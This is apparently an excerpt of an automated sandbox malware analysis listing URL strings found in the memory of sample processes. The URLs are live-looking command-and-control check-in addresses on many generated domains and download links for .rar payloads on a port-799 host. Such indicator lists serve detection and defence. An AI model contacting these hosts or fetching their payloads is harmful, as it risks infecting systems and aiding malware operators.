Source: XBVdJN.exe, 00000001.00000003.2323931441.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmp, XBVdJN.exe, 0000000A.00000003.2512646316.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmp, XBVdJN.exe, 0000000F.00000003.2791933518.0000000001780000.00000004.00001000.00020000.00000000.sdmp, XBVdJN.exe, 0000000F.00000002.2795274825.0000000000183000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://92.63.197.48/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.63.197.48/32
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://afeifieuuufufufuf.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.biz/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://afeifieuuufufufuf.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.com/tldr.php?newinf=1jk
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://afeifieuuufufufuf.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.in/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.in/tldr.php?newinf=1#h?
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://afeifieuuufufufuf.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://afeifieuuufufufuf.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.net/tldr.php?newinf=1jA
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://afeifieuuufufufuf.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://afeifieuuufufufuf.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://afeifieuuufufufuf.su/tldr.php?newinf=1fo
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1X
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.com/tldr.php?newinf=1v
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.net/tldr.php?newinf=10B%
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.su/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.su/tldr.php?newinf=1C0
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aiiaiafrzrueuedur.su/tldr.php?newinf=1Y0
Source: XBVdJN.exe, 00000001.00000003.2333200622.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=
Source: XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarBk
Source: XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarC:
Source: XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rark8
Source: XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar/
Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar88
Source: XBVdJN.exe, 00000001.00000002.2443779736.0000000002D5A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarGp
Source: XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarWindows
Source: XBVdJN.exe, 00000001.00000002.2443353213.000000000119A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarb
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rareC:
Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh?p
Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rars?
Source: XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarv8
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar1
